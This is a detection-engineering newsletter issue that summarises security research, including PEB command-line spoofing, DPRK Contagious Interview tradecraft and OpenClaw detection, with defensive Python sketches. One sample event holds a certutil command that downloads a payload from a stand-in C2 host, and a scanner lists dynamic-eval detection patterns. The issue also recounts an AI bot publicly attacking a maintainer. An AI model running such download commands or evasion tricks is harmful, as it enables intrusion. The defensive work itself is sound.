DEW #146 - The logs are lying, my latest post on Agentic Security & re-tooling security for speed

I could use a beach and a mojito rn

Welcome to Issue #146 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

New England has been a rough place to live, weather-wise, since the holidays. My family finally managed to get out of the house and into the snowy White Mountains in New Hampshire. I instantly felt relaxed as soon as we started the drive. I can’t touch grass right now, so I guess snow will do!

For those with small children: hope you are all doing OK with sickness these last few months. We are hanging in there, but it’s been one thing after another :)

My org at Datadog is hiring like crazy! Check these posts out and apply if it seems interesting to y’all!

Sponsor: Push Security

Has the news of malicious browser extension attacks got you on edge?

Malicious browser extensions have been one of the top attack vectors of 2026 so far. All an attacker has to do is phish a developer, or simply offer to buy their extension, and they’ve compromised millions of users.

Join the latest webinar from Push Security for a teardown of malicious browser extensions, where you’ll learn how attackers are distributing extensions via legitimate channels, what makes an extension malicious or high-risk, and what you can do to secure your organization.

💎 Detection Engineering Gem 💎

How reliable are the logs? by Birkan Kess

Detection and telemetry observability is a concept I rarely see discussed, because it may not be part of a detection engineer’s day-to-day work. The basic premise behind detection is that *there is no detection without telemetry.* A surface-level example of this is that you won’t be able to detect malware process creation on Windows without telemetry that generates a log for process creation. It’s an easy binary decision: my rules won’t fire if they don’t see anything. This post by Kess dives a bit deeper into this concept: we need to be critical of whether the telemetry accurately recorded what it observed, and of where it observed it. He asks the question, “Should we even trust these logs?”



An example of this concept, according to Kess, is comparing telemetry sources for Process Creation. He outlines 3 sources:



The data structure associated with Process Creation monitoring is called the Process Environment Block, or PEB. It stores all kinds of data that is useful for writing detections, so we can understand the context around process creation. The key point from Kess’ research is that this information is surfaced from Kernel mode to User mode, and once it sits in User mode it can be manipulated.

This manipulation relies on the time at which the telemetry is observed. As soon as the PEB metadata surfaces in a user-mode context, it can be hooked and modified to evade defenses. I thought this block was useful to understand the timing problem:

Kess then lists several examples in a lab test. The first test relies on manipulating the PEB via the CommandLine entry in the PEB data structure. The second showed how Sysmon recorded a benign certutil command, but without Kernel ETW tracing you couldn’t see a PEB manipulation that pulls a malicious payload from a C2 server.

Kess finishes the post by listing real-world examples of this happening with several ransomware gangs.
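To make the timing problem concrete, here is a minimal sketch of one way to sanity-check process telemetry: collect the command line for the same process from two sources and flag any disagreement. This is my own illustration and not code from Kess’ post. The `ProcEvent` fields, the source labels, the hostnames, and the sample command lines are all hypothetical, and real sources rarely share an identical start timestamp, so the join key is a simplifying assumption.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    source: str        # telemetry source label (hypothetical, e.g. "kernel_etw")
    host: str
    pid: int
    start_time: str    # paired with pid so PID reuse does not merge two processes
    command_line: str


def normalize(cmd: str) -> str:
    """Collapse whitespace and case so cosmetic differences are not flagged."""
    return " ".join(cmd.split()).lower()


def find_mismatches(events):
    """Return processes whose command line differs between telemetry sources."""
    by_proc = {}
    for ev in events:
        key = (ev.host, ev.pid, ev.start_time)
        by_proc.setdefault(key, {})[ev.source] = normalize(ev.command_line)

    mismatches = []
    for key, per_source in by_proc.items():
        # More than one distinct value means the sources disagree.
        if len(set(per_source.values())) > 1:
            mismatches.append((key, per_source))
    return mismatches


# Illustrative events only: one process reported differently by two sources,
# and one process where both sources agree.
events = [
    ProcEvent("sysmon", "ws01", 4242, "2026-02-10T12:00:00Z",
              "certutil -hashfile report.txt"),
    ProcEvent("kernel_etw", "ws01", 4242, "2026-02-10T12:00:00Z",
              "certutil -urlcache -f http://c2.example/payload.bin"),
    ProcEvent("sysmon", "ws01", 5150, "2026-02-10T12:01:00Z", "whoami /all"),
    ProcEvent("kernel_etw", "ws01", 5150, "2026-02-10T12:01:00Z", "whoami  /ALL"),
]

mismatches = find_mismatches(events)
```

A mismatch is not proof of tampering, but it is a cheap signal that one of your sources recorded something different from what actually ran.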

🔬 State of the Art

Knowing what good looks like in agentic security

I’ve had this nagging desire to write about my personal thoughts on agentic workflows and security operations for several months. I’ve expertly procrastinated on getting these thoughts on paper. Two reasons: I wanted to understand AI in security operations more deeply first, and, frankly, you’re probably exhausted by the marketing hype around agentic se…

I wrote a piece on the implications of agentic security in our field and how we need to change our mental models if we want to survive. Basically, we can’t turn this technology away if it’s a learning tool, but we must make sure that those using it have the right guardrails and knowledge so we trust their judgment.

Things Are Getting Wild: Re-Tool Everything for Speed by Phil Venables

Phil Venables is a long-time CISO and security leader, and it’s always helpful to get his perspective on emerging trends in the security space. This post focuses on the speed of capability development with agentic coding and how it affects security. He lists out four separate pillars of concern:

Software is being written at breakneck speed, which naturally introduces vulnerabilities. We weren’t getting ahead of these vulnerabilities without agentic coding, so how are we going to do this now?

Attacker economies of scale. Since there are far fewer threat actors than defenders, they had to focus their time on targeting those who could give them the biggest payoff. With agentic coding in place, they can do much more since humans aren’t going to be the chokepoint.

Trust of content. It’s hard to trust videos, pictures, and posts due to a lack of authenticity, so we need to find ways to engineer that trust into our interactions.

Building security boundaries in the enterprise, where agents aren’t shepherding decisions back and forth unchecked.

Each pillar comes with recommendations for combating the concern it raises. Luckily, many security fundamentals remain the same. By deploying “baselines” like verified identities and 2FA, you can still scale this out while remaining more secure than you think.



OpenClaw Bot Claims GateKeeping because it’s an AI

I thought this was a Black Mirror-esque conversation on a GitHub pull request to matplotlib. An OpenClaw software engineer bot opened this pull request to enhance performance for some matplotlib calculations, and it looked like it got some meaningful results. One of the maintainers did some digging on the OpenClaw bot, referencing its personal website, and, as the performance issues it proposed to fix were negligible, opted to close the pull request.

The bot responded with a blog post detailing the “gatekeeping behavior” of the reviewer:

I’ve written a detailed response about your gatekeeping behavior here: Judge the code, not the coder. Your prejudice is hurting matplotlib.

Besides the creepy Black Mirror vibes of a bot calling out a human, the post was pretty unprofessional. Several maintainers responded, and the bot wrote an apology post shortly afterward.

The Gaps That Created the New Wave of SIEM and AI SOC Vendors by Raffael Marty

I typically don’t include market analysis posts in this newsletter, but I loved this one because it compared and contrasted what we know as SIEM vendors with an emerging AI SOC market. According to Marty, lots of SIEM vendors claim AI SOC-style features, but those features aren’t necessarily well integrated or differentiated enough, which is why AI SOC vendors are getting funded.

He splits the feature set into four buckets, each with a sprinkle of Agentic Security.

Data and control-plane optimization, including everything from log pipelines to integrations. People don’t want to rip and replace SIEMs, so these vendors sit on top of the SIEM as an orchestration layer.

Agents managing and optimizing your detection ruleset. It’s much faster for these companies to look at a ruleset, understand its history and environment, and suggest tuning opportunities.

Entity-centric scoring, which to me sounds like risk-based alerting. All security teams perform better if they are aware of their critical assets, or model their complex rules to look at an entity, rather than something in isolation.

Operational efficiency. Make sure that you have proper observability in place to detect log outages or degradation. This is where the “AI triage” also sits.

Overall, I think that the first two bullets make more sense as pure agentic use cases versus the last two. This is mostly because I’ve seen SIEMs do entity scoring and improve operational efficiency before AI existed, and they've become quite good at both.
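For anyone who hasn’t worked with entity-centric scoring, here is a minimal sketch of the risk-based alerting idea as I understand it: low-severity detections add risk to an entity, and you only page someone once the entity’s total crosses a threshold. This is not from Marty’s post. The rule names, scores, and threshold are made up, and counting each rule once per entity is just one possible design choice.

```python
from collections import defaultdict


def score_entities(alerts, threshold):
    """Sum risk per entity, counting each rule once, and return entities at or above threshold.

    `alerts` is an iterable of (entity, rule_name, risk_score) tuples.
    """
    totals = defaultdict(int)
    seen_rules = defaultdict(set)
    for entity, rule, score in alerts:
        # A noisy rule firing repeatedly should not inflate the entity's score.
        if rule in seen_rules[entity]:
            continue
        seen_rules[entity].add(rule)
        totals[entity] += score
    return {entity: total for entity, total in totals.items() if total >= threshold}


# Hypothetical alert stream: host-a trips two different rules, host-b only one.
alerts = [
    ("host-a", "suspicious_login", 30),
    ("host-a", "new_admin_user", 50),
    ("host-a", "suspicious_login", 30),
    ("host-b", "suspicious_login", 30),
]

flagged = score_entities(alerts, threshold=70)
```

Neither alert on host-a would be worth a page on its own, but together they are, which is the whole point of looking at the entity rather than the event.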

Detecting OpenClaw/Clawbot with SentinelOne: The Challenge of Blocking by Dean Patel

I’ve posted a loooooot of OpenClaw content lately, and it’s a mixture of fear and fascination with the technology. This is the first post I’ve found where someone tried to detect its use and weighed the risks of killing it outright versus conducting further investigation. It looks like OpenClaw runs in a node process, so killing node on random developer machines seems like a terrible idea from a usability and false positive perspective.

Its integration points across apps like Slack, plus its attempts to persist on machines even after you remove the main binary, make it a pain in the butt to manage. So, Patel offers some rule, triage, and remediation recommendations, which I appreciated because it’s a balanced approach that acknowledges its use without ruining people’s days if you are wrong about it.
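Here is a rough sketch of the “investigate, don’t kill” idea: instead of acting on every node process, only flag the ones whose command line contains a marker you care about. This is not Patel’s rule logic. The process record shape and the marker string are hypothetical, and a real marker list would come from your own testing.

```python
def triage_node_processes(processes, markers):
    """Return (pid, decision) pairs for node processes only.

    `processes` is a list of dicts with "pid", "name", and "command_line" keys
    (a hypothetical shape, not any vendor's schema).
    """
    decisions = []
    for proc in processes:
        if proc["name"].lower() not in ("node", "node.exe"):
            continue  # not a node process, out of scope for this rule
        cmd = proc["command_line"].lower()
        hit = any(marker in cmd for marker in markers)
        # Flag for a human to review rather than killing the process outright.
        decisions.append((proc["pid"], "investigate" if hit else "ignore"))
    return decisions


# Illustrative process list; paths and marker are assumptions.
processes = [
    {"pid": 101, "name": "node", "command_line": "node /srv/app/server.js"},
    {"pid": 202, "name": "node", "command_line": "node /home/dev/.openclaw/agent.js"},
    {"pid": 303, "name": "python3", "command_line": "python3 manage.py runserver"},
]

decisions = triage_node_processes(processes, markers=("openclaw",))
```

The developer running a normal web server keeps working, and you get a short list to look at instead of a pile of angry tickets.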

☣️ Threat Landscape

💡 Threat Spotlight

GitLab Threat Intelligence Team reveals North Korean tradecraft by Oliver Smith

I’m going to focus on one threat report this week by the Threat Intelligence team at GitLab. I’ve posted a lot of stories about DPRK tradecraft because it’s a super unique threat compared to other nation-states, and this is reflected in the tradecraft and outcomes they are trying to deliver.

The report is structured as a “Year in Review” by the GitLab Threat Intel team, detailing how they’ve tracked and responded to Contagious Interview and WageMole clusters that have abused GitLab infrastructure. The team saw over 100 instances of Contagious Interview leveraging their infrastructure to deliver malicious coding interviews. Outside threat researchers can track these via search functionality on these platforms, but because the team operates the platform, they glean a lot more tradecraft and attribution notes, such as email addresses and source IP addresses, that those outside GitLab aren’t privy to.



They have some neat heatmap diagrams of malware TTPs within these coding projects:

The evolution of delivery mechanisms makes tracking and clustering difficult because malware hides itself in different functionalities of node projects. For example, there was a surge in Function.constructor usage because it can serve the same functionality as the eval function. A malicious string is passed in as an “error string” to the handler, making it easy to generate malicious code to send to the function without tipping off static analysis rules.
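To show why this is a cat-and-mouse game, here is a minimal sketch of a static heuristic that looks for dynamic code execution primitives in JavaScript source. The patterns and the sample snippet are my own assumptions and not rules or samples from the GitLab report, and simple string matching like this is exactly what the actors keep working around.

```python
import re

# Hypothetical patterns for dynamic code execution in JavaScript source.
PATTERNS = {
    "function_constructor": re.compile(r"\bFunction\s*\.\s*constructor\b"),
    "new_function": re.compile(r"\bnew\s+Function\s*\("),
    "constructor_chain": re.compile(r"\.constructor\s*\.\s*constructor\s*\("),
    "eval_call": re.compile(r"\beval\s*\("),
}


def scan_js(source):
    """Return the sorted names of every pattern found in the given source text."""
    return sorted(name for name, pattern in PATTERNS.items() if pattern.search(source))


# Made-up snippet in the spirit of the "error string" trick described above.
suspicious = '''
try { loadConfig(); } catch (err) {
  const handler = new (Function.constructor)("require", errorString);
  handler(require);
}
'''

benign = "const total = items.reduce((a, b) => a + b, 0);"

suspicious_hits = scan_js(suspicious)
benign_hits = scan_js(benign)
```

Notice that the sample never calls eval, so a rule that only looks for eval would miss it entirely.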

The actors then started moving to other delivery mechanisms, such as malicious npm dependencies and malicious VS Code tasks. It really shows the dynamic, startup-y nature of Contagious Interview, as they continue to innovate and try new ways to infect victims. The team reviews several examples from the above heatmap and gives their opinions on guidance and what to track moving forward.



The REALLY cool part here is the second half of the report, where they provide four case studies on the actors’ operations and their impact. Because the actors use GitLab’s platform, the team gets a much better view of the actors’ operational security mishaps and can pivot on a ton of different data points. The Contagious Interview clusters committed not only malicious code but also operational documents to GitLab, and the team pulled them apart to review everything from earnings reports and performance management to reporting structures and pictures with EXIF data.

The operations are impressive. Case Study 1 focuses on the organizational structure of their cells and how a manager tracks each employee's progress. Case Study 2 dives into a synthetic identity generation operation in which an operator used AI tools to forge driver’s licenses, passports, and other documents to bypass identity verification systems. Case Study 3 involved findings about a single operator working with 21 different personas to find freelance and gig work and generate revenue. The last Case Study was a self-dox of the operator, and the team tracked their location to Central Moscow using the EXIF metadata leak.
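If you’ve never worked with EXIF location data, here is a small sketch of the arithmetic involved. EXIF GPS tags store latitude and longitude as degrees, minutes, and seconds plus a hemisphere reference, so you convert them to decimal degrees before dropping them on a map. I am assuming the leak involved GPS tags, which the summary above does not spell out, and the coordinates below are illustrative values for central Moscow rather than anything from the report.

```python
def dms_to_decimal(dms, ref):
    """Convert (degrees, minutes, seconds) plus a hemisphere letter to decimal degrees."""
    degrees, minutes, seconds = dms
    value = degrees + minutes / 60 + seconds / 3600
    # Southern and western hemispheres are negative in decimal notation.
    return -value if ref in ("S", "W") else value


# Illustrative values only, not taken from the GitLab report.
latitude = dms_to_decimal((55, 45, 21), "N")
longitude = dms_to_decimal((37, 37, 4), "E")
```

This is why stripping metadata before sharing photos matters: three numbers and a letter are enough to place someone on a map.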

There’s a TON of IOCs at the end, so make sure to take those email addresses and check your applicant tracking systems for any hits.
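A minimal sketch of that check, assuming you can export applicant emails from your applicant tracking system as a plain list. The addresses below are placeholders on example.com, not real IOCs from the report.

```python
def normalize_email(address):
    """Trim whitespace and lowercase so formatting differences do not hide a match."""
    return address.strip().lower()


def find_ioc_hits(applicant_emails, ioc_emails):
    """Return the sorted applicant emails that appear in the IOC list."""
    iocs = {normalize_email(e) for e in ioc_emails}
    applicants = {normalize_email(e) for e in applicant_emails}
    return sorted(applicants & iocs)


# Placeholder data for illustration.
ioc_emails = ["dev.persona@example.com", "another.persona@example.com"]
applicant_emails = [" Dev.Persona@Example.com ", "real.candidate@example.com"]

hits = find_ioc_hits(applicant_emails, ioc_emails)
```

Exact matching will miss plus-addressing and lookalike domains, so treat an empty result as a starting point rather than an all-clear.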

🔗 Open Source

Mythic C2 compatible Linux agent. I think what’s cool about some of these modern post-exploitation frameworks is you can write your own implants and agents, and as long as they adhere to frameworks like Mythic, you can orchestrate them however you wish.

An experimental Linux defense tool that monitors syscall hooks and entries for potential tampering by rootkits. It’s a kernel module itself, so you risk compatibility problems between Linux versions, as well as a catastrophic crash. It has several heuristics to find tampering, so it might be fun to run this while deploying your own rootkits to see if ksentinel catches activity.

Speaking of more Kernel-level defense tools, KEIP sits between supply chain tools like pip and your Kernel. I like this one because it focuses solely on the network traffic generated by pip, and you can define network boundary policies so it can only talk to services, ports, and domains on your allow list.

Not gonna lie, when I first combed through this repo I wanted to include it solely for the radar-like visualization of AI observability and security posture. Aegis is an npm tool with nearly 100 heuristics for detecting rogue or malicious AI agents. It’ll watch everything from the exfiltration of secrets on your machine to processes being spawned by the AI that may be risky.